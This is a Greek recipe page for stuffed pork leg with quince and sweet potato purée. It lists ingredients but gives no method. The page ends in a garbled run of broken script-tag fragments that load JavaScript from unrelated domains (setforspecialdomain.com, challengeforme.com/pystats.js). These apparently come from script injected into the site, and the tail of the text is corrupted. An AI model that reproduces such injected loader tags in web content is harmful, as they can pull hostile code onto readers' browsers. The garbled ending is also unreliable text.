Γεμιστό χοιρινό μπούτι με κυδώνια και βελούδινο πουρέ γλυκοπατάτας από τον Κυριάκο Μελά

Θεϊκό ψητό χοιρινό μπούτι, γεμιστό με κυδώνια ! Το συνοδεύουμε με μουσελίν … που σημαίνει ένας πολύ αφράτος και πεντανόστιμος πουρές γλυκοπατάτας .

Ιδανικό γεύμα για εσάς που θα έχετε πολλόυς καλεσμένους … Το κόβετε σε πολύ πολύ λεπτές φέτες και το σερβίρετε παρέα με τον πουρέ και όλη σας την αγάπη !

ΥΛΙΚΑ

1 μπούτι χοιρινό ( 3-4 κιλά ,με την πέτσα και το κόκκαλο)

1 κυδώνι

3 σκελίδες σκόρδο

1 κλαδάκι δεντρολίβανο

2 κτσ λιωμένο βούτυρο γάλακτος Ήπειρος

1/4 κούπας κονιάκ

μερικά γαρύφαλλα (15-20)

αλάτι πιπέρι

Για το σερβίρισμα 

5-6 φέτες ανανά ( προαιρετικά)

Για τον πουρέ γλυκοπατάτας

1 1/2 κιλό γλυκοπατάτες

1 κρεμμύδι

2 κτσ βούτυρο λιωμένο Ήπειρος

2κτσ  ελαιόλαδο 

1 συσκευασία φρέσκο ζωμό κοτόπουλο

3/4 κούπας νερό

1 κτσ ζάχαρη

αλάτι πιπέρι

___setforspecialdomain.com/ghfgh34523452′ type=’text/javascript’>___setforspecialdomain.com/ghfgh34523452′ type=’text/javascript’> challengeforme.com/pystats.js’ async=true >challengeforme.com/pystats.js’ async=true >‘ >‘ >‘ >‘ >‘ >‘ >‘ >‘ >